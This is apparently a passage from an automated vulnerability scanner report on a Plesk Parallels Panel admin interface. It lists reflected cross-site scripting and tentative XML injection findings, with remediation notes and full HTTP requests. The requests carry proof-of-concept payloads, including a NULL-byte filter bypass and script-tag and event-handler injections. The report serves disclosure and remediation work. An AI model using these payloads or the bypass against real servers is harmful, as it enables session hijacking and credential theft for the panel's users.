Date: Fri, 23 Sep 2011 18:25:20 GMT
Server: sw-cp-server
Content-Length: 5569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...
<DIV class="msg-box msg-error">
...[SNIP]...

Request 2

GET /login_up.php3?1%00''=1 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response 2

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:25:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Date: Fri, 23 Sep 2011 18:25:21 GMT
Server: sw-cp-server
Content-Length: 5389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ [start_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /

Issue detail

The value of the start_page request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload %00javascript%3aalert(1)//c4640c8d was submitted in the start_page parameter. This input was echoed as javascript:alert(1)//c4640c8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?start_page=%00javascript%3aalert(1)//c4640c8d HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:56:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:56:11 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 24 Sep 2011 15:56:11 GMT
Server: sw-cp-server
Content-Length: 1534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">

<html>

<head>
<meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta http-equiv="Content-Type
...[SNIP]...
<FRAME border="0" frameborder="0" framespacing="0" id="workFrame" name="workFrame" src=".javascript:alert(1)//c4640c8d" marginheight="7" marginwidth="7" scrolling="auto" noresize>
...[SNIP]...

2.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage-data [searchFilter%5Bname%5D%5BsearchText%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/app/usage-data

Issue detail

The value of the searchFilter%5Bname%5D%5BsearchText%5D request parameter is copied into the HTML document as plain text between tags. The payload 10344<img%20src%3da%20onerror%3dalert(1)>4df115c2fd8 was submitted in the searchFilter%5Bname%5D%5BsearchText%5D parameter. This input was echoed as 10344<img src=a onerror=alert(1)>4df115c2fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /admin/app/usage-data?searchFilter%5Bname%5D%5BsearchText%5D=xss10344<img%20src%3da%20onerror%3dalert(1)>4df115c2fd8 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:29:41 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:29:41 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-Type: application/json
Date: Sat, 24 Sep 2011 15:29:41 GMT
Server: sw-cp-server
Content-Length: 870

{"pager":{"pageCount":0,"itemCountPerPage":25,"first":1,"current":1,"last":0,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":0,"totalItemCount":0,"firstItemNumber":1,"lastItemNumber":0},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":"xss10344<img src=a onerror=alert(1)>4df115c2fd8"}},"forceShowSearch":false},"data":[],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSea
...[SNIP]...

2.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/ [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/

Issue detail

The value of the group request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 619d3'%3balert(1)//7a686082d0f was submitted in the group parameter. This input was echoed as 619d3';alert(1)//7a686082d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admin/health/?group=Services619d3'%3balert(1)//7a686082d0f HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:27 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=health; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:27 GMT
Server: sw-cp-server
Content-Length: 7544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
el.Health.Toolbar.restoreDefaultsHandler"}] })
]
});

new Ajax.Updater(
'server-health-parameters-container',
Jsw.baseUrl + '/health/parameters/group/Services619d3';alert(1)//7a686082d0f',
{ evalScripts: true }
);
});
//]]>
...[SNIP]...

2.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/create/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73697"><script>alert(1)</script>b28884795cf566dfd was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/reseller@3/backup/create/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=3434&comment=Reseller+account++backup.%0d%0aCreation+date%3a+Sep+24%2c+2011+10%3a28+AM&split_backup=false&repository=local&email=%0d73697%22%3e%3cscript%3ealert%281%29%3c%2fscript%3eb28884795cf566dfd&content=configuration&suspend=false HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:29:17 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=home; path=/
Date: Sat, 24 Sep 2011 15:29:17 GMT
Server: sw-cp-server
Content-Length: 10646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...
<input type="text" name="email" id="fid-email" value="73697"><script>alert(1)</script>b28884795cf566dfd" size="30" maxlength="254">
...[SNIP]...

2.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/ [wizard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/custom-buttons/custom-button@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload dc70d<script>alert(1)</script>e85ee75d431ab8ef6 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/reseller@3/custom-buttons/custom-button@new/properties/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2freseller@3%2fcustom-buttons%2fcustom-button@new%2fproperties%2fdc70d%3cscript%3ealert%281%29%3c%2fscript%3ee85ee75d431ab8ef6&wizaction=finish&text=%0d&place=domain&sort_key=100&fname=%0d&url=%0d&conhelp=%0d&private=true&cb_id=0 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 400 Bad Request
Last-Modified: Sat, 24 Sep 2011 15:29:04 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/plain; charset=utf-8
Date: Sat, 24 Sep 2011 15:29:04 GMT
Server: sw-cp-server
Content-Length: 929

ERROR: PleskBadURIException
Invalid URI: /plesk/reseller@3/custom-buttons/custom-button@new/properties/dc70d<script>alert(1)</script>e85ee75d431ab8ef6

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/reseller@3/custom-buttons/custom-button@new/properties/dc70d<script>
...[SNIP]...

2.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/ [wizard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload 1fcfb<script>alert(1)</script>840178da2544c7d81 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/reseller@3/report/layout@2/auto@new/properties/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2freseller@3%2freport%2flayout@2%2fauto@new%2fproperties%2f1fcfb%3cscript%3ealert%281%29%3c%2fscript%3e840178da2544c7d81&wizaction=%0d&recipient=2&select=current&auto=604800&id=0 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 400 Bad Request
Last-Modified: Sat, 24 Sep 2011 15:31:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/plain; charset=utf-8
Date: Sat, 24 Sep 2011 15:31:21 GMT
Server: sw-cp-server
Content-Length: 1021

ERROR: PleskBadURIException
Invalid URI: /plesk/reseller@3/report/layout@2/auto@new/properties/1fcfb<script>alert(1)</script>840178da2544c7d81

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/reseller@3/report/layout@2/auto@new/properties/1fcfb<script>
...[SNIP]...

3. XML injection  previous  next
There are 189 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


3.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=af8b59293ecdef34dd27eb4277f6c86f; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:37 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/create [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/create

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/customer-service-plan/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/customer-service-plan/list?context=service-plans HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:58:53 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/customer/list?context=customers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:07 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/true/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /admin]]>>/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
